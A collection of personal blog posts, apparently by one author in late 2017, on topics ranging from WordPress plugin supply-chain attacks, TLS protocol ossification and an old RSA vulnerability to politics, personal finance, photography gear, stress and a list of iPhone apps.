Per Wordfence there are four reasons for supply-chain (i.e. plugin-based) attacks on WordPress installations:
The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.
Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.
Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.
Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er do wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.
The aforementioned points outline why acquiring and infecting WordPress plugins is a reasonable way of penetrating WordPress installs. However, I think that Wordfence is missing the most important reason that such attacks succeed: few actual users of WordPress are technically component to monitor what, exactly, their plugins are doing. Nor are the shared hosting services particularly good at identifying and alerting technically-illiterate users that their sites are compromised and what the site owners need to do to remediate the intrusion.
Trying to get individual users to more carefully monitor how their plugins work is a fool’s errand. What’s needed is for hosts to provide a community service and actively not just identify hijacked plugins (and sites) but, also, provide meaningful remediation processes. User education and alerts aren’t enough (or even moderately sufficient): companies must guide site owners through the process of cleaning their sites. Otherwise malware campaigns aimed at WordPress will persist and grow over time.
It’s the time of year when people reflect on past annual resolutions while beginning to think about what resolutions they’ll ‘commit’ to in the coming year. I enjoy the idea of establishing annual targets and goals. Not just because it’s fun to imagine how great life would be if you hit them all, but because it provides an ongoing sense of direction in what is often a rote world. More than that, resolutions, goal setting, or whatever else you call it are helpful for providing a lens through which to reflect on a year gone by.
I had one standard resolution, which I absolutely failed to make possible, and a host of them that were far more successful. I fully exited consumer debt hell, increased monthly student loan payments, photographically documented many of the major events in my life, dealt with the last administrative aspects of my last relationship, and mostly righted my financial ship. All of those were major life accomplishments and have done things like change how I visually see the world every day, how I experience my relationships with money, and how I approach my relationships today. It’s not just that I finished something but that in the course of undertaking a series of activities I’ve opened up entirely new (and, arguably, healthier) ways of seeing the world.
But there were other things that I accomplished that I think are as important as those goals that were set last year. I think I’m most proud of the fact that I can see ways in which I’ve grown emotionally. In specific, in my desire to avoid some of the mistakes of my last relationship I’ve had honest and oftentimes painful conversations that were based on what I believe to be right for me; rather than subsuming myself to make life easier I’ve just been me, even when doing so might cause challenges in my relationships. Such challenges, however, are healthy insofar as strong areas of disagreement aren’t indications of a lack of love but, instead, of a healthy set of egos that simply must come to a consensual agreement on how to proceed. Learning how to love in a healthy way has been scary while also amplifying my ability to be present and with others in ways I never understood as possible.
I’ve also managed to overcome some long held fears that were the result of bullying I experienced while growing up. The result is that I can make healthy choices for my body without having a voice in the back of my head that sabotages my efforts to be fitter, eat better, and be happier in my own body. Getting over those particular demons is especially important, in my situation, given that I’m creeping up on the age when coronary diseases start to take the lives of the men in my family.
In the coming days I’ll be thinking through the kinds of resolutions and thematics that I want to carry forward into the coming year. Centrally, I think I’m going to have ‘testable’ objectives, insofar as I’ll be able to actually measure whether or not I’ve advanced in some of the hobbies that I’m involved in, while also trying to find ways of deprioritizing activities that are pleasurable but don’t really do much to advance my physical, intellectual, artistic, professional, or emotional wellbeing.
I spent a significant amount of time thinking about the implications of path dependency in socio-technical systems over the course of my doctoral degree. For my work, I hypothesized that similar kinds of technologies in a path-dependent system would unfold in similar ways cross-jurisdictionally. This common unfolding would take place because once technological development began down a particular path, other paths would be foreclosed and a common end would be reached regardless of regulation, policy, or law.
In the work I did, this dependency wasn’t actually evidenced with much regularity. But some of that was because the technologies I was looking at were heavily socialized: they were used for a range of different tasks and, as such, their development impetuses were often decidedly non-technical. In contrast, the development of Transport Level Security (TLS) has a kind of path dependency that is notably challenging to deviate from, not just because clients and servers must implement new versions of the protocol but because developers of middle boxes simply assume technology will unfold in a given way and have developed their own technologies based on those assumptions. In reaction, the Internet community has spent a considerable amount of time trying to ameliorate the difficulties that arise when implementing new versions of the protocol, difficulties linked to assumptions as to how the protocol would, and will, develop.
Cryptographers are increasingly talking about the problems associated with adopting new versions of TLS as ‘joints’ ‘rusting shut.’ As discussed by Cloudflare, in the context of middleboxes:
Some features of TLS that were changed in TLS 1.3 were merely cosmetic. Things like the ChangeCipherSpec, session_id, and compression fields that were part of the protocol since SSLv3 were removed. These fields turned out to be considered essential features of TLS to some of these middleboxes, and removing them caused connection failures to skyrocket.
If a protocol is in use for a long enough time with a similar enough format, people building tools around that protocol will make assumptions around that format being constant. This is often not an intentional choice by developers, but an unintended consequence of how a protocol is used in practice. Developers of network devices may not understand every protocol used on the internet, so they often test against what they see on the network. If a part of a protocol that is supposed to be flexible never changes in practice, someone will assume it is a constant. This is more likely the more implementations are created.
It would be disingenuous to put all of the blame for this on the specific implementers of these middleboxes. Yes, they created faulty implementations of TLS, but another way to think about it is that the original design of TLS lent itself to this type of failure. Implementers implement to the reality of the protocol, not the intention of the protocol’s designer or the text of the specification. In complex ecosystems with multiple implementers, unused joints rust shut.
To some extent, the lesson to be taken from the efforts to update to TLS 1.3 is to have protocols which are simpler in nature and with fewer moving parts.1 Another lesson is that it takes years to actually shift the global population of Internet devices en masse to more secure ways of communicating. But perhaps the most fundamental lesson — to my mind — is that the security of the Internet is still trying to mediate and resolve problems which were initially seeded many, many years ago and which may mean it takes up to a decade to fix the specific problems to TLS 1.2.
Built infrastructure such as middleboxes isn’t updated on a regular basis because the infrastructure represents a capital cost. And so even as new protocols struggle to come to terms with the past, they do so by comforming to the paths sets down by previously deployed protocols. Even as TLS 1.3 is deployed and made usable, it will be done so based on how earlier versions of the protocol were designed and then implemented. So the questions that linger include: how will implementers of TLS 1.3 make decisions, and how will their decisions direct the development and implementation of future versions of TLS? In effect: how much will the paths of the past continue to affect how future versions of TLS can be practically — as opposed to hypothetically — developed??
Inspirational Quotation
“Generosity is the most natural outward expression of an inner attitude of compassion and loving-kindness.”
– Dalai Lama
Great Photography Shots
I’ve really fallen in love with some of the shots which were submitted to this year’s Sony Wold Photography Awards.
Per Cloudflare: David Benjamin proposed a way to keep the most important joints in TLS oiled. His GREASE proposal for TLS is designed to throw in random values where a protocol should be tolerant of new values. If popular implementations intersperse unknown ciphers, extensions and versions in real-world deployments, then implementers will be forced to handle them correctly. GREASE is like WD-40 for the Internet. ↩
Seizing on immigration as the cause of countless social and economic problems, Mr. Trump entered office with an agenda of symbolic but incompletely thought-out goals, the product not of rigorous policy debate but of emotionally charged personal interactions and an instinct for tapping into the nativist views of white working-class Americans.
Donald Trump isn’t so much tapping into ‘nativist’ views as, instead, exploiting citizens’ unawareness of the benefits of both immigration and trade. Immigrants contribute to the tax base, take less time off, and their direct descendants also contribute more to the tax base than ‘long-term’ citizens. Immigration is a net gain for ‘regular’ American workers but they haven’t been told just how, and why, their own lives and the social benefits they draw on are significantly improved by immigration into America.
Even as the administration was engaged in a court battle over the travel ban, it began to turn its attention to another way of tightening the border — by limiting the number of refugees admitted each year to the United States. And if there was one “deep state” stronghold of Obama holdovers that Mr. Trump and his allies suspected of undermining them on immigration, it was the State Department, which administers the refugee program.
The State Department is a core centre of American soft power; it’s programs, educational efforts, international outreach, and more are responsible for spreading American values around the world.1 That the administration is hollowing out the department is the truest evidence that the Trump administration is unaware of how, and why, America has managed to maintain its position in the world. While American military might is significantly responsible for the development and maintenance of its imperial stature in the world, this stature is solidified and extended through an adoption of American values. Such values are more than those associated with the military; they’re linked with those spread by staff from State who promote American values in more formal diplomatic efforts as well as the other range of activities undertaken by consular and embassy staff throughout the world.
It is incredibly hard to believe that the Trump administration is barely one year into a four year term. Given the lasting damage the administration has already done to America’s ability to project power around the world, it’s hard to imagine just what America’s stature will be in a few more years. But what’s most significant is that his administration has learned so quickly how to engage in the deliberate hollowing out of the institutions which have long been hallowed to Americans. This kind of learning is indicative that the administration might be successful on more of its more outrageous campaign promises, promises which are being supported by the Congress and Senate, and thus indicative of a broader series of values (or lack thereof) which are held by many American politicians.
In the interests in disclosure: I will personally be enrolled in the State Department’s International Visitor Leadership Program in the coming fall. ↩
My less-busy times this week were spent writing out notes, cards, emails, and other correspondence to some of the most important people in my life. It’s been a challenging year; the world seems to be falling apart due to changes in American politics, deaths and illnesses by family and friends have been hard to take, and the tempo for high-quality professional work never really slows down. And so I took some time writing to the people I’ve most closely worked with, supported, or been supported by to thank them for just being present and active in my life.
I find writing these sorts of messages of thanks, encouragement, and praise challenging. They’re not the kind of thing that I have ever really received much of throughout my personal or professional life; it’s just not normal in my family to communicate our deep feelings for one another, and in academe the point is to move to the next project (and subject it to critique) instead of dwelling on past projects and receiving accolades for them. But as challenging as I find writing these messages they have a profound personal impact: by pulling together my thoughts and writing them down and sending them, I’m humbled by realizing just how blessed I am to be surrounded by the kind, funny, supporting, and amazing people in my life.
There used to be a time when a lot more holiday cards, notes, and messages were sent back and forth between people this time of year. And many people still send cards, but don’t take the time — five, ten, or even twenty minutes — to handwrite a real thought to whomever the recipient happens to be. But those are the cards and notes and emails that people carry with them for years, packing them carefully away as they move from one physical or digital home to another. They don’t cost a lot of money to produce, and in the case of email are almost entirely free, but they show that you’ve spent time thinking about a specific person. And that time, in and of itself, is indicative of someone’s importance in your life.
So before you go out and spend money on another present consider taking that time and, instead, writing a letter or note to whomever the recipient is. Chances are good that they’ll remember and treasure the message you left with them for longer than any material possession your might give them.
Some of the bigger news in the Apple world, this week, has focused on changes to how Apple treats older iPhones which are suffering battery degradation. While the majority of the reporting is focused on how iPhone 6 and 6s devices are experiencing slowdowns — which is the change Apple has imposed as of iOS version 11.2.0 — iPhone 7 devices are also exhibiting the slowdowns as they suffer battery degradation.
I’m of mixed minds on this. I see this as an effort by Apple to avoid having to replace batteries on older (but not THAT old) devices but in a sneaky way: the company’s lack of transparency means that it appears that Apple is trying to pull a fast one on consumers. This is especially the case for those consumers who’ve purchased Apple Care; if their devices are suffering known problems, then Apple should at the minimum be notifying owners to bring the devices in for servicing on a very proactive basis, and that doesn’t seem to have been the case.
So, on the one hand, this is Apple being sneaky.
But on the other it’s a semi-elegant engineering problem to resolve a hard-to-fix problem. We use our smartphones with such regularity and subject them (and, in particular, their batteries) to such exceptional abuse that degradation has to happen. And so I think that Apple stuffing processors into devices (at least in the current and last generation) that are excessive for daily use means the slowdowns are less problematic for most users. They might think that their devices are a bit slower but, generally, still be able to use them for about as long as they used to use them. And that length of use is what most people measure ‘battery life’ by so…maybe Apple is dealing with the problem the way users would actually prefer.
That Apple doesn’t change out batteries when they’re worn down, however, emphasizes that it’s a pretty good idea to resell your devices every year or so in order to get the best return for them as well as in order to enjoy the best performance from your iPhone. And I guess, as a byproduct, if you’re buying a second-hand iPhone you should definitely do a battery test before handing over your cash.
Inspiring Quotation
“Giving is about more than donating money. It’s about sharing your capabilities, content, and connections—and above all, giving others the chance to be heard, respected, and valued.”
I have a whole host of things that I need to do in order to keep a chronic (very non-life threatening!) health condition at bay. Part of that is maintaining a pretty strict work-life balance. When I was doing my doctorate I absolutely failed to conceptualize of, let alone maintain, a real balance and as a result I suffered from a pretty problematic health condition for years and years. And because I didn’t have work-life balance (and ignored advice from those who maintained such a balance) a lot of unpleasant things happened in my life that didn’t necessarily have to and I prioritized the wrong things as being of importance.
I mismanaged relationships. I failed to take advantage of living in one of the most beautiful cities in Canada, if not the world. I didn’t develop, let alone maintain, many friendships at a time where I probably most needed them.
And in reaction to how my life didn’t work during that time, and with the privilege of having a full-time job where I’m not expected to be constantly on the clock, I’ve worked to maintain a balance in my professional and personal activities. The medical result has been that the condition I deal with has become an occasional inconvenience instead of a serious issue in daily life.
This week my carefully maintained work-life balance entirely fell apart. It’s still apart, right now, and that condition is on top of me once again. I cannot wait until the holiday break and the chance to hit the reset button and return to balance. I can only hope that things haven’t gotten bad enough to need to return to visiting my doctors…
A few weeks ago, Ming Thien wrote about the relative importance of the shooting experience that you have with your camera of choice. One of the key things he mentioned was:
… if a camera does not enable us to either translate an idea, preserve a moment or present something otherwise unseen: it isn’t very useful as a tool, no matter how pretty or expensive or high-resolving it might be.
This point really resonated with me. It brought me back to when I was trying to decide which mirrorless camera to purchase. I’d been using (and still do use!) a Sony RX100ii and, temporarily, a Fuji X100. I loved the Fuji but I couldn’t really explain why until after I’d relied almost entirely on the RX100ii for a full year.
While in part I missed the viewfinder, what I was really missing was the ability to rapidly change settings to get the shot that I wanted and, also, to learn what I had to do, to get the shot I wanted. Let me explain.
The Sony is a great little camera. I’ve taken photos with it that I’ve gotten blown up to be pretty large (36 inches by 24 inches) and which now hang on my walls. I have a series of photos I took while in Iceland, Hong Kong, Australia, and other places that I absolutely love. But the shooting experience has always been subpar. The inability to just turn this knob or that one to get exactly what I want, in a second or two, means that shooting with the Sony is often really frustrating. If I can plan a shot it’s great. If it’s in the moment? The shot is missed more than caught.
So when I was looking at different mirrorless cameras to purchase and supplement the RX100ii I was drawn to the Sony a6100, which had amazing specifications. But when I actually held and touched and shot with it I just wasn’t taken by it. It’s an amazing camera but just felt cold. The Fuji line was pretty great – I really wanted to get an X-T10! – but I found the glass to be expensive, especially when I started thinking about buying image stabilized lenses.
So I ended up getting an Olympus EM10ii, instead, and was initially sorta scared of it. There were a lot of knobs to turn and, while I wanted that, it was also intimidating. But as I’ve used the Olympus I’ve come to realize that it is definitely the right camera for me, now. It’s light enough and small enough that I almost always have it with me. It performs pretty well with prime lenses in mixed settings. And while I can lust over other mirrorless systems when they come out I don’t see anything that they do which I absolutely need given my abilities, shooting preferences, and devotion to the hobby right now.
Most importantly, the Olympus feels right in my hands. I’ve used it enough that I’m comfortable with most of the settings that I use1 while it still provides me with a lot of room to learn and grow. I’m pretty comfortable with my 50mm equivalent lens after exclusively shooting with it for several months straight, and reasonably comfortable with the 35mm equivalent that I use.2 In terms of the shooting experience the EM10ii is pretty great for someone who is interested in photography but certainly never expects to do much more than travel the world, shoot, and then make prints for personal or family use. I know it’s not the ‘best’ camera out there but, for me, the shooting experience is pretty close to perfect.
Of course, the camera is super capable at doing lots of things I’m not interested in doing. And as someone who doesn’t ever shoot video the relative limitations of the Olympus camera system over that of either Sony or Panasonic doesn’t bother me. ↩
Perhaps curiously I’m the least comfortable using the kit zoom lens that came with the camera! ↩
A surprisingly big number of top-name websites—Facebook and PayPal among them—recently tested positive for a critical, 19-year-old vulnerability that allowed attackers to decrypt encrypted data and sign communications using the sites’ secret encryption key.
The vulnerability in the transport layer security protocol for Web encryption was disclosed in 1998 when researcher Daniel Bleichenbacher found it in the TLS predecessor known as secure sockets layer. A flaw in the algorithm that handles RSA encryption keys responded to certain types of errors in a way that divulged potentially sensitive information. With enough specially formed queries, attackers could exploit the weakness in a way that allowed them to decrypt ciphertext even when they didn’t have the secret decryption key. SSL architects responded by designing workarounds that suppressed the error messages rather than removing or rewriting the faulty RSA algorithm.
…
The vulnerability of Cisco’s ACE is concerning, because Cisco stopped supporting it several years ago and the researchers said the company has no plans to patch the product line. Even worse, it’s not possible to disable RSA encryption in the product, leaving users unable to follow one of the few possible workarounds for those unable to patch. What’s more, the researchers said Cisco is currently using ACE to serve content on cisco.com.
Companies that are responsible for providing critical infrastructure technologies need to be accountable for what they develop and sell. Imagine if a car company with a known-deficient vehicle refused to fix or repair it on the basis they didn’t support it any longer – there’d be class action suits almost immediately. The technology sector need to mature, and fast.
But as an aside, these are the sorts of weaknesses and vulnerabilities that the NSA and other national security agencies, along with private signals intelligence vendors, actively exploit. The actual ways in which cryptography is implemented are often rife with issues. One has to ask why Cisco and other major companies’ products were vulnerable in the first place but, also, whether the NSA or its sister agencies knew about the weaknesses and have been exploiting them instead of trying to better secure the public’s communications.
In theory the United States of America’s government, as well as the Canadian government, has a Vulnerabilities Equities Process (VEP). If this vulnerability was discovered but not disclosed it would be a damning indictment of the adequacy of the current VEP protocols.
It feels like everyone I know has led a more stressful life this year. Beyond the chaos wrought on the global psyche by the American president, there have also been more deaths, serious illnesses, job losses, and emotional meltdowns than normal. In my own case, the death of two parents and ongoing revelations of sexual assaults and abuses near to my life have been incredibly challenging issues to deal with.
So it was with great interest that I read a piece by Ankita Rao on how she has turned dealing with her personal stress into a kind of science experiment. The tests and activities she points to reveal the number of factors in our lives that amplify underlying stress levels as well as the means we can use to reduce stress in our personal lives. I’ve made a commitment since mid-2017 to actively, and assertively, maintain a particular work-life balance. That involves taking on consulting clients only when the monetary outcome is necessary to address particular fiscal stresses (see: student loans) and ensuring that I actually spend time working out, taking photowalks, and letting myself engage in non-productive play.
I haven’t always been successful. But on the whole I’m exercising a lot more, have taken photos I’m incredibly happy with, and am overcoming a longstanding guilt that playing games is somehow undermining my productivity. I have a long ways to go to ensure the balance I’m trying to achieve is a permanent feature of my life but I feel like habits are starting to settle in, and my overall stress levels declining as a result.
Just prior to Netflix’s release of The Punishersome criticsargued thatthe show had an opportunity to — and failed to — respond to the tragedy of gun violence in the United States. I haven’t quite finished the series but I tend to agree that the show is definitely not directly addressing that issue.
But the show isn’t about gun violence. It’s about what losing family means and drives a someone (read: white males) to do. It’s about the problems linked to how soldiers of all stripes are asked to endure physical and mental hardships and then return home without society acknowledging their sacrifices or providing support for their wounds. Or about how even when support is provided that there is no guarantee that those broken humans will ever be whole again. The show is about how fraught relationships become when we are separated from those we relate to, either by distance, by death, or by betrayal. Throughout the episodes I’ve watched a repeated motif, which does pertain to gun violence, is how firearms can prompt the aforementioned hardships, either by killing in the name of one’s country or in the name of one’s personal ideology or simply by accident when weapons are nearby.
I entered the workforce ‘late’ in terms of my ability to save for retirement. Since I went to school until my early 30s, and lived paycheque to paycheque to try and stay afloat, and have loan obligations, it’s not going to be until my late 30s or early 40s when I can ‘really’ save for my retirement. And that assumes that I save for retirement instead of for a home or condo that I own.1
So it was with interest, and trepidation, that I listened to a podcast put out by TVO entitled “Creating Retirement Security.” The conversation they had about people in their 30s was strange to my ears, with guests relying on different baseline facts for their assessments and recommendations. And significantly, not one of the guests recognized that loan payments for student debt are higher than with past generations, nor that repayment periods are longer now than in the past. Several of the guests held an assumption that persons would be saving in their early 20s. While this practice might be true for Canadian Pension Plan (CPP) contributions it’s presumably less the case for Register Retirement Savings Plans (RRSPs) that can grow significantly over the course of 40 years.
Each guest called frequently for ‘financial literacy’. While educational approaches matter and have merit, at the same time such calls assume that retirement decisions should be individualized. Does it fall to specific individuals to ensure that they are earning enough, saving enough, and investing wisely enough to be secure in their retirement? Or is retirement and aging a collective action problem that is best solved as a society as a whole?2
As with many areas of expert knowledge only the barest of basics of financial literacy are likely going to catch on with the general public. Were we, as a society, to take some of the lessons from behaviour economics we’d realize that experts are needed to develop appropriate ‘nudges’ to compel savings,3 while also updating savings models to recognize the precariousness of the labour market for those under 35. That constant threat of un(der)employment, need to service student debt, and potentially provide assistance to parents who have insufficiently saved for their retirement are all pressures on the largest generation now moving through the Canadian workforce. And that’s to say nothing of the need for people to decide if they want to save for their retirement or save for a home that they own. Until all those variables and conditions are appreciated any advice from experts seems to just fall flat.
Great Photography Shots
Flickr released the best 25 shots of 2017 and they’re pretty amazing. The ‘best’ in this case is derived from social and engagement metrics, combined with curation by Flickr’s own staff.
“Say Goodby…” by Iwona Podlasinka, at https://flic.kr/p/ZYM6Hd“Mi Fuego” by Albert Dros at https://flic.kr/p/Tbcpio
I actually do save every month to the tune of about 10-15% of my paycheque, part for retirement and part for an emergency fund. ↩
Guests did spend some time talking about whether retirement savings should should be an individualized/collective problem. But the constant refrain that individuals need to be smarter means that individuals, first and foremost, are seen as the parties that have to assume responsibility for their futures and any collective action work is an idealized maybe-solution to aging in Canada. ↩
To be fair, nudges were discussed, but the hard lessons came down on individuals having to gain literacy to make their own decisions. ↩
This year, the “news aggregator law” came into effect in Russia. It requires websites that publish links to news stories with over one million daily users (Yandex.News has over six million daily users) to be responsible for all the content on their platform, which is an enormous responsibility.
“Our Yandex.News team has been actively working to retain a high quality service for our users following new regulations that impacted our service this past year,” Yandex told Motherboard in a statement, adding that to comply with new regulations, it reduced the number of sources that were aggregated from 7,000 to 1,000 with “official media licenses.”
The predicable result of the Russian government’s new law is that the government can better influence what information is surfaced to Russian citizens: when state news outlets release the same press release, en masse, Yandex1 and other major aggregators with a large number of readers are predominantly exposed to what the government wants them to see. So while Russia may interfere with foreign countries’ political processes by exploiting how social network and aggregator algorithms function (along with out-and-out illegal exfiltration and modification of communications data) they, themselves, are trying to immunize themselves to equivalent kinds of threats by way of the liabilities they place on the same kinds of companies which do business in Russia.
More broadly, the experience in Russia and changes in how Yandex operates should raise a warning flag for caution advocates in the Western world who are calling for social media companies to be (better) regulated, such as by striking down or modifying Section 230 of the Communications Decency Act (CDA). While there are clear dangers associated with these companies operating as contemporary digital sovereigns there are also risks associated with imposing harsh liability systems for publishing other persons’ content.
While such regulations might reduce some foreign interference in political systems it could simultaneously diminish the frequency at which legitimate alternative sources of information which are widely surfaced to the public. It remains unclear just how we should regulate the spread of malicious political messaging2 but, at the same time, it’s critical to ensure that any measures don’t have the detrimental effect of narrowing and diminishing the political conversations in which citizens can participate. It’s the very freedoms to have such conversations that distinguishes free democratic countries from those that are more autocratic.
Sidenote: Yandex is the only website I’ve ever had to block from scraping my professional website because it was functionally acting as a DDoS. ↩
One idea would be to deliberately cut down on how easy it is to spread any and all information. By requiring additional manual effort to share content only the most motivated would share it. Requiring actual humans to share content with other humans, if done in a robust way, might cut down on the ability of bots to automatically propagate content as though ‘real’ people were sharing it. ↩
The chase for cheap page views to arbitrage against advertising dollars is the real reason everyone at this mega page view factories willingly embraced this trend towards free content, which in turn left the whole experiment open to abuse. If you generate a lot of page views for these sites, you aren’t going away, because, in the end, it is all about page views.
On my other, professional, site I regularly receive requests from marketers to publish their content for some sort of payment. Many are outlandish in their requests whereas others have clearly done their homework and identified a range of posts the given brand wants to be associated with.
Some of the payment rates or product offerings are outlandish, others churlish, but none of them have ever overcome my baseline position: I own my professional web presence in order to build my reputation and brand. That brand is worth more than a few hundred or thousand dollars; it represents, at least in part, my ability to earn money over the span of the coming decades.
While there’s been some comic back and forth about charging marketers tens or hundreds of thousands of dollars to post other parties’ branded content, I think there is legitimately something to the idea. If you view your web presence as a long-term part of your career, and damaging that presence could potentially cost you in terms of future employment opportunities or consulting prospects, then that kind of valuation starts to make some sense.
Screenshot of my iPhone 7 homescreen from December 2017
My homescreen is mostly divided between stuff that I want immediate access to on a very regular basis and one or two ‘testing’ applications (in terms of position on the homescreen and/or whether I like them as applications). Without further ado:
Photography (Folder): I play with a lot of different photo apps, though I tend to alternate between Darkroom and Snapseed a fair bit and rarely use Polar anymore. Slow Shutter is something I’m playing around with off and on, and ProCam was free.
Reminders: I don’t like the application but since I basically just use it for groceries I’m not willing to spend money for a ‘better’ app.
Notes: Much of my life exists in Notes. I wish there was better support for markdown and would love tagging support. And it’d be great if Apple would fix the freezing bug that was introduced in iOS 11! But on the whole Notes plays well across all my Apple devices and the interface just gets out of the way.
Messages: Not my default means of communicating with people, in part because I try to avoid sending SMS messages as best I’m able for security reasons, but it’s a necessary evil in my life.
Phone: I take and make a lot of calls.
WhatsApp: My preferred method of communicating because it’s a cross-platform app (don’t need to know if someone is on an iPhone, Android, Blackberry, or whatever else) and encrypts voice-, video-, and text-based messages end-to-end. Still, it leaks some metadata and so, in some instances I use…
Signal: The best of consumer-available secure messaging app. Unlike WhatsApp, Signal keeps the bare minimum amount of information required to process communications.
Podcasts: I listen to silly numbers of Podcasts. I had problems with the application in iOS 9 but they seem to have been fixed in iOS 10/11. Importantly, the application syncs well across all the Apple devices that I own.
Hello Weather: I wish I could download and use Dark Sky but it’s not available in the Canadian App Store. Hello Weather pulls data from the same repository as Dark Sky so it’s as accurate, if not as pretty.
Day One: I’ve kept digital journals in one format or another for well over 15 or 16 years. I’ve been using Day One for a few years and love the interface.
Ulysses: I keep coming back to Ulysses even though I don’t derive any joy from using it. It’s certainly functional and lets me publish to my WordPress websites and I enjoy how it does markdown. But the interface is the definition of ‘meh’ for me.
Reeder: Too much of my time is spent in Reeder. I follow a lot of wonky websites and blogs, plus fashion, tech, culture, and more. So much to read and so little time!
Paprika: A relatively new application in my life, I’m seeing whether the application fits into my life. Previously I was using the Notes app to keep track of recipes but that didn’t scale very well. My hope is that Paprika really does take over part of my life and make shopping that much more pleasant.
iBooks: For pleasure reading I only purchase digital copies through iBooks. I realize it’s a walled garden but I’ve long since made my peace with that.
Activity: I’ve tracked my baseline activity information for almost ten year and this app collects daily information from my Apple Watch. I use a separate application — Healthview — to study longer-term trends in my personal fitness and health.
Halide: The newest application in my life! Though I usually shoot with my mirrorless camera, sometimes it’s not convenient and so I whip out my iPhone. Halide gives me more control over what I’m shooting and I really appreciate the ability to turn on focus peaking.
Safari: Because I, too, browse the Internet.
Mail: It’s not the best of clients but it’s as bad as most. And the really good ones would force me to move my mail through additional third-parties, and I’m not willing to engage in that kind of activity.
Tweetbot: I use Twitter a lot and a large portion of my professional network is located there. But the official Twitter application is just horrible in my view, whereas Tweetbot gets out of my way and lets me just enjoy the content steaming by.
Music: I usually have music playing in the background if I’m not listening to a podcast.
Excited Pixels 